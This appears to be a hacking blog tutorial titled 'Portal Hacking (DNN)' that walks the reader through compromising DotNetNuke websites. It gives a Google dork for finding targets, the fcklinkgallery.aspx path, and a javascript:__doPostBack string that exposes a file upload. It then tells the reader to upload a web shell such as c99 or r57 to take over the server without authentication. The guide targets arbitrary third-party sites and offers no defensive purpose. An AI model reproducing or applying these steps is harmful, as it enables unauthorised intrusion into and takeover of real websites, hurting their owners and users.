HACK WEBSITE USING DotNetNuke (DNN) | PORTAL HACKING

Portal Hacking (DNN) - Is a type of website hacking technique that uses google to search for DNN vulnerable or hackable site. This is done with the help of google dorks. That is why it is known that google is one of the cyber elements that make a hackers job easier.

How to hack using (DNN)

• Go to www.google.com

• In the google search box, type the following dork;

:inurl:/tabid/36/language/en-US/Default.aspx

The above dork is simply used to search for a DNN vulnerable site. see the image below;

• Now let say that we have found a vulnerable site like; (just an example)

www.site.com/Home/tabid/36/Lan...S/Default.aspx

 All you have to do is modify the vulnerable url by replacing;

/Home/tabid/36/Lan...S/Default.aspx

with this;

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

So that you will have something that looks like this;

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

• Now enter the modified url in address bar and hit Enter! You will get the link gallary

•  Now on the ''link type'' menu select ''File'' and then replace the url in your browser's address bar with the following script and hit Enter!

  javascript:__doPostBack('ctlURL$cmdUpload','')

An ''upload'' option should appear on the link gallary menu as shown bellow;

•  Now Upload your shell c99,c100, r57 etc ...... and its game over!!!  

Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly WITHOUT authenticating your self. With a help of a shell you can easily remove/edit/replace files,. in shot taking over the server as if you where the admin :P